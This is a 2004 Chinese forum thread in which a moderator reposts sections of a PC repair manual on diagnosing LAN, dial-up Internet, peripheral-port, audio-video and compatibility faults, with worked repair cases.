       2004-1-28 16:57:16新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第11楼

               常见故障判断－－－ 局域网类故障
              一、定义举例
              这类故障主要涉及局域网宽带网等网络环境中的故障。
              二、可能的故障现象
              1、 网卡不工作，指示灯状态不正确；
              2、 网络连不通或只有几台机器不能上网、能Ping通但不能连网、网络传输速度慢；
              3、 数据传输错误、网络应用出错或死机等；
              4、 网络工作正常，但某一应用下不能使用网络；
              5、 只能看见自己或个别计算机；
              6、 无盘站不能上网或启动报错；
              7、 网络设备安装异常。
              8、 网络时通时不通。
              三、可能涉及的部件
              网卡、交换机（包括HUB、路由器等）、网线、主板、硬盘、电源等相关部件。
              四、判断要点/顺序
              1. 维修前的准备
              1) 可用的网线（直连线和普通网线，线序符合国际标准）；
              2) 如有条件，带上网线连接检查器。
              2. 环境检查
              1) 电源连接检查：
              A. 市电的接线定义是否正确；
              B. 是否有地线；
              C. 网络上的各设备（如：HUB、交换机等）是否均已上电工作。
              2) 网线连接检查：
              A. 网线连接线序是否与网络连接的要求匹配（如直连和普通网线）；
              B. 网线的连通性是否正常，要查看网线有无破损、过度扭曲；
              C. 网线长度是否过长（如5类双绞线长度超过技术规格要求的100米）；
              D. 网线接头——水晶头是否完好、是否氧化；
              E. 网卡接口是否完好。重新插拨网线检查网线与网卡连接是否松动；
              F. 根据电缆要求是否有终结器，终结器是否正常。
              3) 网络设备外观及周边检查：
              A. 加电启动后，网卡指示灯是否亮等；
              B.
              HUB等设备的网线接口，在与终端或服务器连接后，如果终端或服务器启动及配置正常，其指示灯会亮（注意指示灯颜色是否正常，参考设备说明书），如果指示灯不亮，说明设备有故障；

              C. 网卡部件是否接插到位无翘起，网卡上金手指是否氧化；
              D. 网线或交换机等设备周围是否有干扰。
              4) 主机外观检查：
              A. 检查机箱内是否有异物造成短路；
              B. 机箱内的灰尘是否过多，如果是，应清理灰尘；
              C. 主板与网卡上元器件是否有变形、变色现象；
              D. 加电后，注意部件、元器件及其它设备是否有异味、温度异常等现象发生。
              5) 其它方面：
              A. 在UNIX下，要分清是终端死机还是服务器死机
              3. 故障判断要点
              1) 寻求用户网管的配合。
              首先应尽可能与网管联系，以得到网管合作。
              2) 网络环境检查：
              A. 对于掉线、丢包等故障，要注意检查网卡与交换机间的兼容性；
              B. 网络连接正常，但不能进行域登录，要从以下几点检查：
              a) 指明的域名是否存在或已工作；
              b) 是否已按服务器、xx作系统的要求（如在服务器端启用了WINS解析服务、DNS服务等，WINXP
              HOME版不能登录到域中。），设置终端允许登录到域中，计算机名是否已注册到域中；
              c) 检查使用的协议是否正确；
              C. 检查是否安装了防火墙，是否被授权访问；
              D. 在必要时，使用直连线只连接两台机器在对等网环境下检查是否可连网（这样做可排除网络上诸环境因素的影响）。
              3) 网络适配器驱动与属性检查：
              A.
              驱动程序是否正确、合适。网卡设备建议由系统自动识别，并尽可能使用与xx作系统匹配和更新的驱动程序（只有老型号的ISA网卡才可使用手动安装的方法进行驱动的安装）。在安装驱动程序时，如有必要，可将启动中加载的和正在运行的程序关掉，再行安装；

              B.
              网卡在某一网络环境下工作不正常，可调整网速，如对于10/100Mbps的网卡，如果工作在10Mbps的网络环境下，网络工作不正常，应特别指定网卡工作在10Mbps的速度上；

              C. 检查网络通信方式，如是否为全双工等。
              4) 网络协议检查：
              A. 检查网络中的协议等项设置是否正确（不管用哪种协议，必须保证网内的机器使用的协议一致）。网络中是否有重名的计算机名；
              B.
              如果不能看到自己或其它计算机，先通过按F5多刷新几次来检查，然后检查是否安装并启用了文件和打印共享服务、是否添加了NETBEUI协议（如果网络环境中有WINS服务器，则不需添加，如没有则要添加）；

              C. 如能ping通网络，但不能在网上邻居中访问其它终端或服务器，可用ipconfig
              /all（在命令行方式）、netstat等命令查看具体信息，检查网络属性的设置，如域、工作组等，并进行相应的更改；
              D. TCP/IP协议的实用程序ping命令，可用来检查网络的工作情况。这需要维修人员了解TCP/IP协议的相关知识（顺序：PING
              127.0.0.1，本机IP、本网段IP、网关、DNS等）；
              E. 如果PING不通，可尝试在网络属性中把所有的适配器和协议删除，重启后重新安装；
              F. 通过执行tracert <目标IP地址>命令,检查IP包在哪个网段出错；
              5) 系统设置与应用检查：
              A. 检查机器自检完成后，所列的资源清单中网卡是否被列其中（非PNP网卡除外），其所用资源与其它设备有无共享；
              B.
              检查系统中是否有与网卡所用资源相冲突的其它设备，如有，可通过更换设备间的安装位置，或手动xx作更改冲突的资源。对于ISA总线的网卡，可能需要在CMOS中关掉其所占中断的PnP属性，且其所用资源一般不宜与其它设备共享。较老的PCI设备也不宜与其它设备共享资源；

              C. 检查系统中是否存在病毒；
              D.
              如果某一特定的应用在使用网络时工作不正常，检查CMOS设置是否正确，重点检查网卡的驱动程序是否与其匹配，必要时，关闭其它正在运行的应用程序，及启动中加载的程序，看是否能正常工作，或与能够正常运行该应用的机器进行比较，检查在配置方面有何不同；

              E. 通过重新安装系统，检查是否由于系统原因而导致网络工作不正常。
              6) 硬件检查：
              A. 用网卡自带程序和网卡短路环检测网卡是否完好；
              B. 如更换网卡后仍不正常，可更换主板，更换主板仍不能解决时，可考虑更换其它型号网卡；
              7) 对于无盘站，注意检查以下几点：
              A. BIOS中是否允许了从网络启动，BIOS中最好禁用软驱，将"Report No FDD For Win
              95"，由Yes更改为No（或反之。这与软驱的设置有关）
              B. 对于ISA网卡，其BIOS的设置，应使BOOT ROM默认的起始地址为D800H
              或C800H，I/O为300H（如有些网卡的默认设置为C800H容易与AGP显卡等部件占用的地址资源冲突导致安装失败）。；
              C. 在以上xx作无效时，对有些主板，屏蔽板载声卡，再根据需要进行相应的修改。
              D. 工作站的协议必须与服务器协议一致；
              E. 有多台服务器时，必须指定第一响应服务器。
              对于无线网络，特别要注意：
              A. 检查两台终端间的有效距离是否过大，中间是否有隔离物；
              B. 对等网络下，所使用的频率通道是否一致；
              C. 在用AP的环境下，终端的网络ESSID必须与AP一致；
              D. 检查网卡和AP的密钥的密钥是否相符。
              五、本类故障的判断流程
              见附录一之（七）。
              六、案例
              案例一：
              问题描述：网卡不工作，指示灯状态不正确；
              解决方案：首先观察系统设备管理器中有没有网卡这个设备，若没有则更换网卡或重新插拔网卡测试，并看金手指部分有没有锈迹，若有，则用橡皮擦干净测试。

              案例二：
              问题描述：局域网内，只有几台机器能连网，大部分不能互访。网卡灯亮，HUB灯闪
              解决方案：见到这种情况，要从软硬两个方面来分析，首先：
              a、软件方面，使用最新版本的KV3000进行了查、杀病毒工作，没有发现任何病毒，从而排除了病毒干扰的可能性。网络方面，安装了NetBEUI、IPX/SPX和TCP/IP协议，网卡的驱动也正确安装，在设备管理中没有发现任何冲突，并进行了协议绑定。设置了文件、打印机共享，也设定了工作组名称和计算机名称。应该说从网络协议到共享资源设置等均没有问题，可以排除软件方面的错误。

              b、从硬件方面分析，大致有四种可能：其一是网线断路，无法形成信号回路；其二是网线的线序是否正确；其三是在集线器与计算机间连接用的网线过长，超过100米；其四集线器端口有问题。针对这四种可能性，逐个进行排除。使用测线工具或万用表测量网线，发现网线连接状况很好，没有断路。通过目测，连接用的网线长度不可能超过100米。将几台网络已连通的计算机接在集线器上的插口换到怀疑损坏的集线器端口上，这几台计算机仍然互通，说明集线器端口没有损坏。

              c、通过对网线线序的检查，发现用户的制作的线序是1、2、3、4，问题就出在这儿，因为RJ45插头正确的连接应该是使用1、2、3、6，其中1、2是一对线，3、6是一对线，其余四根线没有定义。查出了问题，只需为用户重新做网线头，插入后网络正常。

              案例三：
              问题描述：脑在“网上邻居”中只能看到自己，而看不到其他电脑，从而无法使用其他电脑上的共享资源和共享打印机
              解决方案：使用ping命令，ping本地的IP地址或主机名，检查网卡和IP网络协议是否安装完好。如果能ping通，说明该电脑的网卡和网络协议设置都没有问题。问题出在电脑与网络的连接上。因此，应当检查网线和Hub及Hub的接口状态，如果无法ping通，只能说明TCP/IP协议有问题。重新设置网络协议，对于10台以下的机器且不上Internet的机器可考虑用NetBEUI协议，若上Intrnet则用TCP/IP协议，不管用哪种协议，必须保证网内的机器使用的协议一样。

              案例四：
              问题描述：无盘站不能上网或启动报错；
              解决方案：
              NOVELL无盘工作站不能正常登录服务器有以下几种情况：
                  a．工作站屏幕上出现“Error opening boot disk image file ”OR“Unable to open
              image file”
                  这可能是连到了一个没有包含远程启动映像文件的服务器。把启动映像文件拷到这个服务器的Login目录下；如果使用的是多远程启动映像文件，检查Bootconf.sys中对工作站是否进行了正确设置，应确保网络地址和节点地址的正确，如果以上都正确，那么可能是远程启动映像文件有问题，可以测试生成启动映像文件的软盘能否正常启动有盘工作站。若还不行，可以运行一下RPLFIX实用程序。

                  b．工作站屏幕上出现“Error finding server”
                  在确保硬件线路连接没问题的前提下，检查服务器上是否安装了“Ethernet_802.3”帧类型，远程启动映像文件的net.cfg
              中是否包含Ethernet_802.3，这种就是前面所说的旧型的IPX芯片，它不支持Ethernet－802.2帧。按照相应的帧类型重新制作启动映像文件。

                  c．工作站在从远程启动映像文件装入网卡驱动时挂起，屏幕并显示下面类似信息：Ethernet card is improperly
              install or net connected the network.
                  这就是由于前面所说的旧式IPX芯片在Netware
              4.X以上使用时，在远程启动映像文件中没有RPLODI.com或远程启动映像文件的批处理文件中ISL.com下行没有RPLODI.com行。

                  d．工作站显示“Loading MS－DOS”并挂起
                  这是由于远程启动映像文件使用了DOS 5．0或以上版本，对远程启动映像的文件运行RPLFIX实用程序。
                  e．屏幕上出现“batch file missing”
                  出现这个消息是由于autoexec.bat或其它批处理文件（对多个远程启动映像所使用的批处理）没有同时存在于LOGIN目录和用户登录目录。

              [此贴子已经被作者于2004-1-28 17:13:39编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:57:49新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第12楼

               常见故障判断－－－ Internet类故障
              一、定义举例
              主要是与浏览Internet有关的软、硬件故障。如：不能拨号、不能浏览网页等。
              二、可能的故障现象
              1、 不能拨号、无拨号音、拨号有杂音、上网掉线；
              2、 上网速度慢、个别网页不能浏览；
              3、 上网时死机、蓝屏报错等；
              4、 能收邮件但不能发邮件；
              5、 网络设备安装异常；
              6、 与调制解调器相连的其它通信设备损坏、或反之。
              三、可能涉及的部件
              调制解调器、电话机、电话线、局端。余类同 “局域网类故障”。
              四、判断要点/顺序
              1、 环境检查
              1) 周边及外观检查：
              A. 市电的接线定义是否正确，是否有地线；
              B. 外置MODEM附近是否有变压器等设备或其它可造成干扰的电器设备；
              C.
              电话是否有防盗打功能，是否安装了IP电话拨号器、传真机等外部设备。这些外部设备连接是否正确，工作是否正常（单独工作和连机情况下）；
              D. 检查机箱内灰尘是否较多，是否有异物造成短路，插接部件是否接插到位，无翘起；
              E. 主板、MODEM或宽带上网网卡上元器件是否有变形、变色等现象；
              F. 网卡接口接触是否良好；
              G. 加电后注意部件、元器件及其它设备是否有异味、温度异常等现象发生。
              2) 信号线连接：
              A. 电话线是否正确连接，连接的电话线是否正常，用户的电话是否为分机，是否有来电提醒；
              B. 拨打的电话号码是否有限制；
              C. 宽带上网其网线定义是否正确，能否连通，有条件的话将机器更换环境（如：到邻居家中或回站）后再进行测试，以验证是否为连线问题；
              2、 故障判断要点
              1) MODEM配置检查：
              A. 检查CMOS中的设置是否正确。MODEM设备是否被系统认到；
              B. 软件最小系统加MODEM，检查故障现象是否消失。如消失。则是硬件之间的不兼容或资源冲突造成的故障；
              C.
              在设备管理器中检查MODEM驱动是否正确，是否有资源冲突。MODEM支持的协议是否与局端不兼容。在驱动不正确时，可能会造成上网掉线、上网速度慢等现象。将原MODEM驱动删除（最好在控制面板——调制解调器中将MODEM删除），安装主板驱动后重新安装MODEM驱动程序；

              D. MODEM设备属性设置是否正确（如使用的连接速度等）。
              2) 拨号器/拨号过程检查：
              A.
              检查用户所用的拨号程序，是否为第三方的软件，建议用一新建的拨号连接，拨号上网（最好能不用用户的账号），检查是否能拨号，是否报错；
              B. 注意察看报错信息，初步判断故障原因（如：报680错误，是没有拨号音，678错误，是远程服务器没响应等）；
              C. 用户是否有权访问Internet网络。
              3) 网络属性及协议检查：
              A. 如果是通过服务提供商来拨号上网的，除一定要安装IP协议外，不应对IP地址等参数进行设定。其它上网方式，应按要求进行相关的设定；

              B. 使用的拨号协议是否与服务商要求的一致（如使用PPP协议等）。
              4) IE检查：
              A. 对于Windows 98系统，如果IE有故障，建议升级IE到5.5版本，或打补丁；
              B.
              检查IE属性设置是否正确，检查IE是否因上某一网站而被修改。如果临时文件过多，可造成上网后无法浏览网页（可在IE属性中删除临时文件等。关于删除的方法，见本章之后）。是否因为没有安装某些网站所必须的插件，而造成不能浏览网页。检查IE中的安全级别设置，和分级检查设置，恢复成默认值；

              C. 检查是否因上某些网站，造成系统被修改（如注册表被禁用等）；
              D. 检查用户的软件环境，是否由于防病毒、防火墙之类的软件，或其设置不正确，造成浏览困难。
              5) 系统检查：
              A. 检查系统中是否有病毒；
              B. 在MSCONFIG中关掉所有启动时加载的程序，关掉所有正在运行的程序。防止软件冲突造成的无法上网；
              C. 必要时重新安装xx作系统进行测试。
              6) 硬件检查：
              A. 更换MODEM所在的插槽，重新检测MODEM并安装驱动，如果无法上网，更换MODEM测试；
              B. 如果是在雷雨后出现不能拨号等现象，除检查电缆线及其上的其它设备是否损坏外，应查MODEM是否已损坏；
              C. 如还不能上网，注意检查其它硬件；
              7) 宽带上网如出现故障，还需检查：
              A. 检查网卡驱动是否安装正确；
              B. 用闭环测试网卡是否正常；
              C. 根据当地实际情况将拨号属性设置正确，根据宽带上网说明重新安装拨号软件，设置各项设置；
              D. 更换不同型号网卡进行测试，排除不兼容现象；
              E. 联系电信局或小区网管检查网络环境或连接设备；
              F. 对于自动上网的，代理服务器不要进行设置，对于早期的宽带网，需要设置IP。
              五、本类故障的判断流程
              见附录一之（八）。
              六、案例
              案例一：
              问题描述：
              一客户机器采用98xx作系统，在拨号上网时发现网页无法打开，但右下脚确实有链接的图标，发现无网络流量，但多拨几次后问题解决，此问题复现无规律，客户需要解释原因并证明不是机器的问题。

              解决方案：客户要求给予一个合理的解释，因为机器并非无法上网，了解到这一点就应该从软件方面来考虑，不能一上来就换硬件，给客户感觉不好。

              机器可以正常拨号说明机器的Modem硬件和驱动没有问题，但仔细观察后发现网络流量为0，说明机器并没有在网上，右下脚的链接符号可能是一种假相，使用ipconfig/all命令发现机器没有获得IP地址，为什么会有这种现象呢Ｉ诵纳能会和电信接入端有关，反复测试几次拨号上网，发现只要拨号后如果获得IP地址就一定可以上网，如果没有获得IP地址，就一定无法打开网页，客户看到这种现象后基本认可我的说法，并希望通过重新安装xx作系统来看是否可以解决，通过重新安装98xx作系统后问题依旧，客户已认为机器没有问题，在新的98下我为客户用另外一种方式进行测试，即用98里边的超级终端来拨号，原因是超级终端在拨号时可以看到拨号的全过程，是否可以得到IP地址，在使用超级终端拨号5－6次后发现有一次没有得到IP地址，至此客户完全信服了，正真的原因在于电信的局端，而不是在于机器本身。

              案例二：
              问题描述：客户机器所装的xx作系统为98，除安装Modem外，还加了一块网卡，客户机器平时使用网卡上局域网的，网卡获得IP是采用DHCP方式，但在拨号时无法拨号上网，可是有拨号音，客户要求彻底解决。

              解决方案： 客户以前曾经用过Modem拨号上网，现在无法使用，情绪较激动，除了解决外还需要充分的沟通，因此处理的过程很重要。
              我在测试时发现故障复现，经过和客户沟通，发现客户以前确实可以拨号上网，最近由于安装了一块网卡，局域网可以上，拨号是用不成了，从和客户的沟通后，我认为不是机器本身的问题，还是和设置及xx作系统本身有关，因为在2000下别的机器上是没有此问题的。首先我将网卡屏蔽掉，然后测试拨号上网，发现故障消失，难道和网卡有关，将网卡打开，发现可以拨号上网，问题解决！怎么回事，重新启动后发现局域网上去后拨号再次出现异常，故障复现，使用超级终端拨号发现无法获得IP地址，OK，问题找到，但是什么原因造成无法获得IP地址呢Ｉ诵拇来和xx作系统有关，因为2000下并无此问题，应该在98下和网卡有关，由于此局域网是采用DHCP方式，我用winipcfg将网卡IP
              Realse，再次拨号故障解决，总算找出了问题的所在，反复启动并释放网卡IP后拨号正常，后经和微软工程师沟通，确定95和98确实有这种问题，但2000下已经解决了此问题，至此问题圆满解决，客户表示非常认可。

              案例三：
              问题描述：客户自己买了一个Modem，用此Modem可以拨号163/169上网，但其却无法拨到公司的局域网上收发邮件，客户希望协助解决，虽然客户的Modem不是标配的。

              解决方案：客户自己对电脑还是比较熟悉的，因此只是要求我们协助处理，查出真正的原因，所以在处理这个问题时尽量不要打开机箱，做换主板之类的xx作，重点要来考虑兼容性。

              因为可以拨到163上，无法拨到公司网上，所以我重点要看客户Modem的型号及协议，客户的Modem是国产同维的产品，支持V.90协议，客户公司的Modem是美国3COM的产品，也支持V.90协议，首先用超级终端拨号到公司，发现出现拨号音后2秒后自动断调，没有到获得IP地址的那一步，这就说明这两个Modem出现了兼容性问题，在握手阶段出现了问题，向客户解释清楚后，客户向其单位借了一个3COM
              Modem，首先用拨号网络测试一切正常，再用超级终端测试发现一切正常，客户非常认可，认为我们的测试方式很有说服力。

              [此贴子已经被作者于2004-1-28 17:13:54编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:58:20新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第13楼

               常见故障判断－－－ 端口与外设故障
              一、定义举例
              这类故障主要涉及串并口、USB端口、键盘、鼠标等设备的故障。
              二、可能的故障现象
              1、 键盘工作不正常、功能键不起作用；
              2、 鼠标工作不正常；
              3、 不能打印或在某种xx作系统下不能打印；
              4、 外部设备工作不正常；
              5、 串口通信错误（如：传输数据报错、丢数据、串口设备识别不到等）；
              6、 使用USB设备不正常（如USB硬盘带不动，不能接多个USB设备等）；
              三、可能涉及的部件
              装有相应端口的部件（如主板）、电源、连接电缆、BIOS中的设置。
              四、判断要点/顺序
              1、 维修前的准备
              1) 准备相应端口的短路环测试制具；
              2) 准备测试程序QA、AMI等——这些程序要求在DOS下运行；
              3) 根据站内的资源，准备相应端口使用的电缆线，如并口、打印机线、串口线、USB线等。
              2、 环境检查
              1) 连接及外观检查：
              A. 设备数据电缆接口是否与主机连接良好、针脚是否有弯曲、缺失、短接等现象；
              B. 对于一些品牌的USB硬盘，应向用户说明最好使用外接电源以使其更好的工作；
              C. 连接端口及相关控制电路是否有变形、变色现象；
              D. 连接用的电缆是否与所要连接的设备匹配（如：两台机器通过串口相连，就应使用空调制解调器连接线而不能使用MODEM线等）。
              2) 外设检查：
              A. 外接设备的电源适配器是否与设备匹配；
              B. 检查外接设备是否可加电（包括自带电源，和从主机信号端口取电）；
              C. 检测其在纯DOS下是否可正常工作。如不能工作，应先检查线缆或更换外设及主板；
              D. 如果外接设备有自检等功能，可先行检验其是否为完好；也可将外接设备接至其它联想机器检测。
              3、 故障判断要点
              1) 尽可能简化系统，无关的外设先去掉；
              2) 端口设置检查（BIOS和xx作系统两方面）：
              A. 检查主板BIOS设置是否正确，端口是否打开，工作模式是否正确；
              B. 通过更新BIOS、更换不同品牌或不同芯片组主板，测试是否存在兼容问题；
              C.
              检查系统中相应端口是否有资源冲突。接在端口上的外设驱动是否已安装，其设备属性是否与外接设备相适应。在设置正确的情况下，检测相应的硬件——主板等；

              D. 检查端口是否可在DOS环境下使用，可通过接一外设或用下面介绍的端口检测工具检查；
              E.
              对于串、并口等端口，须使用相应端口的专用短路环，配以相应的检测程序（推荐使用AMI）进行检查。如果检测出有错误，则应更换相应的硬件；

              F.
              检查在一些应用软件中是否有不当的设置，导致一些外设在此应用下工作不正常。如：在一些应用下，设置了不当的热键组合，使某些键不能正常工作。

              3) 设备及驱动程序检查：
              A. 驱动重新安装时优先使用设备驱动自带的卸载程序,如Z32打印机；
              B. 检查设备软件设置是否与实际使用的端口相对应，如USB打印机要设置USB端口输出；
              C. USB设备、驱动、应用软件的安装顺序要严格按照使用说明xx作；
              D. 外设的驱动程序，最好使用较新的版本，并可到厂商的网站上去升级。
              [此贴子已经被作者于2004-1-28 17:14:06编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:59:13新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第14楼

               常见故障判断－－－ 音视频类故障
              一、定义举例
              与多媒体播放、制作有关的软硬件故障。
              二、可能的故障现象
              1、 播放CD、VCD或DVD等报错、死机；
              2、 播放多媒体软件时，有图像无声或无图像有声音；
              3、 播放声音时有杂音，声音异常、无声；
              4、 声音过小或过大，且不能调节；
              5、 不能录音、播放的录音杂音很大或声音较小；
              6、 设备安装异常。
              三、可能涉及的部件
              音、视频板卡或设备、主板、内存、光驱、磁盘介质、机箱等。
              四、判断要点/顺序
              1、 维修前的准备
              1)
              除必备的维修工具外，应准备最新的设备驱动、补丁程序、主板BIOS、最新的DirectX，标准格式的音频文件（CD、WAV文件）、视频文件（VCD、DVD）；

              2) 熟悉多媒体应用软件的各项设置，如WINDOWS下声音属性的设置、声卡/显卡附带应用软件的设置、视频盒/卡应用软件的设置等；
              3) 有针对性的了解用户的信息，主要了解：出现故障前是否安装过新硬件、软件、重装过系统（包括一键恢复）。
              2、 环境检查
              1) 检查市电的电压是否在允许的范围内（220V±10%）；
              2)
              检查设备电源、数据线连接是否正确，插头是否完全插好，如音箱、视频盒的音/视频连线等；开关是否开启；音箱的音量是否调整到适当大小；
              3) 观察用户的xx作方法是否正确；
              4)
              检查周围使用环境，有无大功率干扰设备，如：空调、背投、大屏幕彩电、冰箱等大功率电器。如果有应与其保持相当的距离（50厘米以上）；
              5) 检查主板BIOS设置是否被调整，应先将设置恢复出厂状态，特别检查CPU、内存是否被超频。
              3、 故障判断要点
              1)
              对声音类故障（无声、噪音、单声道等），首先确认音箱是否有故障，方法：可以将音箱连接到其他音源（如录音机、随身听）上检测，声音输出是否正常，此时可以判定音箱是否有故障；

              2) 检查是否由于未安装相应的插件或补丁，造成多媒体功能工作不正常；
              3)
              对多媒体播放、制作类故障，如果故障是在不同的播放器下、播放不同的多媒体文件均复现，则应检查相关的系统设置（如声音设置、光驱属性设置、声卡驱动及设置）。乃至检查相关的硬件是否有故障；

              4)
              如果是在特定的播放器下才有故障，在其他播放器下正常，应从有问题的播放器软件着手，检查软件设置是否正确，是否能支持被播放文件的格式。可以重新安装或升级软件后，看故障是否排除；

              5)
              如果故障是在重装系统、更换板卡、用系统恢复盘恢复系统、或使用一键恢复等情况下出现，应首先从板卡驱动安装入手检查，如驱动是否与相应设备匹配等；

              6)
              对于视频输入、输出相关的故障应首先检查视频应用软件采用信号制式设定是否正确，即应该与信号源（如有线电视信号）、信号终端（电视等）采用相同的制式。中国地区普遍为PAL制式；

              7)
              进行视频导入时，应注意视频导入软件和声卡的音频输入设置是否相符，如：软件中音频输入为MIC，则音频线接声卡的MIC口，且声卡的音频输入设置为MIC；

              当仅从光驱读取多媒体文件时出现故障，如：播放DVD/VCD速度慢、不连贯等，先检查光驱的传输模式，应设为“DMA”方式；
              9)
              检查有无第三方的软件，干扰系统的音视频功能的正常使用。另外，杀毒软件会引起播放DVD/VCD速度慢、不连贯等（如瑞星等，应关闭）；
              10) 软件检查
              A. 检查系统中是否有病毒；
              B. 声音/音频属性设置：音量的设定，是否使用数字音频等；
              C. 视频设置：视频属性中分辨率和色彩深度；
              D. 检查DirectX的版本，安装最新的DirectX。同时使用其提供的Dxdiag.exe程序，对声卡设备进行检查
              E.
              设备驱动检查：在WINDOWS下“系统—设备管理”中，检查多媒体相关的设备（显卡、声卡、视频卡等）是否正常，即不应存在有“？”或“！”等标识，设备驱动文件应完整。必要时，可通过卸载驱动再重新安装或进行驱动升级。对于说明书中注明必须手动安装的声卡设备，应按要求删除或直接覆盖安装（此时，不应让系统自动搜索，而是手动在设备列表中选取）；

              F.
              如用户曾重装过系统，可能在装驱动时没有按正确步骤xx作（如重启动等），导致系统显示设备正常，但实际驱动并没有正确工作。此时应为用户重装驱动。方法可同上；

              G.
              用系统恢复盘恢复系统、或使用一键恢复后有时会出现系统识别的设备不是用户实际使用的设备，而且在WINDOWS下“系统—设备管理”中不报错，这时必须仔细核对设备名称是否与实际的设备一致，不一致则重装驱动（如：更换过可替换的主板后声卡芯片与原来的不一致）；

              H. 重装驱动仍不能排除故障，应考虑是否有更新的驱动版本，应进行驱动升级、或安装补丁程序。
              11) 硬件检查
              A. 用内存检测程序检测内存部分是否有故障。考虑的硬件有主板和内存；
              B.
              首先采用替换法检查与故障直接关联的板卡、设备。声音类的问题：声卡、音箱、主板上的音频接口跳线；显示类问题：显卡；视频输入、输出类问题：视频盒/卡；

              C. 当仅从光驱读取多媒体文件时出现故障，在软件设置无效时，用替换法确定光驱是否有故障；
              D. 对于有噪音问题，检查光驱的音频连线是否正确安装，音箱自身是否有问题，音箱电源适配器是否有故障，及其他匹配问题等；
              E. 用磁盘类故障判断方法，检测硬盘是否有故障；
              F. 采用替换法确定CPU是否有故障；
              G. 采用替换法确定主板是否有故障。
              五、本类故障的判断流程
              见附录一之（十）。
              六、案例
              案例一：
              问题描述：用户报修同禧E5000电脑，安装的WINDOWS
              XP系统。用户在播放音视频文件，如VCD、CD、MP3等时，音箱里“滋滋”的噪音很明显。
              解决方案：
              一般看到此类问题，总是会先想到是音箱的问题，或者主板的声卡有问题。但是工程师先后更换音箱、主板都是故障依旧。此时维修陷入困境。
              其实只要仔细观察并思考一下，本着先软后硬的思路去观察，问题应该能很快解决的。此案例中，由于机器本身出厂是DOS系统，WINDOWS
              XP是用户自己安装的，声卡驱动也是WINDOWS
              XP自己认的，而恰恰是XP自带的驱动出了问题，造成用户报修的问题现象。只要安装随机驱动光盘里的相应的驱动程序，问题就迎刃而解了。
              案例二：
              问题描述：用户购买的未来先锋722机器，自己按装了 WINDOWS
              98，发现播放CD时无声音。在声音控制里已经打开了CD的控制，并且把音量调节到最大了。
              解决方案：首先我们要知道这点，联想出厂预装WINDOWS
              XP的机器，已经不再配置光驱和声卡之间的音频线了，播放CD时都采用XP本身提供的数字音频功能直接播放。而WINDOWS
              98不具备数字音频的功能。明白了这一点，用户的问题的答案也就明朗了。
              告诉用户机器标配中利用WINDOWS XP的数字音频功能播放CD，所以机器没有配置光驱音频线。而WINDOWS
              98不支持数字音频功能，所以会产生这样的问题。建议用户还是使用WINDOWS XPxx作系统，或者自己添加一根音频线。
              从这个案例不难看出，对产品配置、技术规范的了解和掌握对于我们解决用户问题是很重要的保证。
              [此贴子已经被作者于2004-1-28 17:14:18编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:59:39新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第15楼

               常见故障判断－－－ 兼容或配合性故障
              一、定义举例
              这类故障主要是由于用户追加第三方软、硬件设备而引起的软、硬件故障。
              这类故障，在前面的几类故障中已部分提及，因此有些故障现象可能与前面所介绍的故障判断类似，可参考。
              二、可能的故障现象
              1、 加装用户的设备或应用后，系统运行不稳定，如：死机或重启等；
              2、 用户所加装的设备不能正常工作；
              3、 用户开发的应用不能正常工作；
              4、 用户需要的配置在联想机上不能满足（如需要加装大容量内存、需要多个串口等）。
              三、可能涉及的部件
              所有可能的部件或软件。但影响第三方应用最多的部件应该是：主板、CPU、内存、显示卡，及新型接口的外设。
              四、判断要点/顺序
              1、 环境检查
              1) 检查外加设备板卡等的制作工艺，对于工艺粗糙的板卡或设备，很易引起黑屏、电源不工作、运行不稳定的现象；
              2)
              检查追加的内存条是否与原内存条是同一型号。不同的型号一是会引起兼容问题，造成运行不稳定、死机等现象；另一是要注意修改BIOS中的设置；

              3)
              更新或追加的部件，如CPU、硬盘等的技术规格是否能与其余的部件兼容。过于新的部件或规格较旧的部件，都会与原有配置不兼容。如：较旧的部件不支持电源管理，从而使系统运行时，使用这样的部件就会工作不正常，或是使整个系统也不能正常工作。

              2、 故障判断要点
              1) 开机后应首先检查新更新的或追加的部件，在系统启动前出现的配置列表中能否出现。如果不能，应检查其安装及其技术规格；
              2)
              如果造成无显、运行不稳定或死机等现象，应先去除更新或追加的部件或设备，看系统是否恢复到正常的工作状态，并认真研读新设备、部件的技术手册，了解安装与配置方法；

              3)
              外加的设备如不能正常安装，应查看其技术手册了解正确的安装方法、技术要求等，并尽可能使用最新版本的驱动程序。如果不能解决，应检查外加设备的质量及原系统的工作情况；

              4)
              检查新追加或更新部件与原有部件间是否存在不能共享资源的现象，即调开相应部件的资源检查故障是否消失，在不能调开时，可设法更换安装的插槽位置，或在BIOS中更改资源的分配方式；

              5) 检查是否由于BIOS的原因造成了兼容性问题，这可通过更新BIOS来检查（注不一定是最新版或更高版本，可以降低版本检查）；
              6) 查看追加的部件上的跳线设置是否恰当，并进行必要的设置修改；
              7) 对于使用较旧的板卡或软件，应注意是否由于速度上的不匹配而引起工作不正常；
              通过更改系统中的设置或服务，来检查故障是否消失。如电源管理服务、设备参数修改等；
              9) 检查原有的软硬件是否存在性能不佳的情况，即通过更换硬件或屏蔽原有软件来检查

              [此贴子已经被作者于2004-1-28 17:14:29编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 17:00:12新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
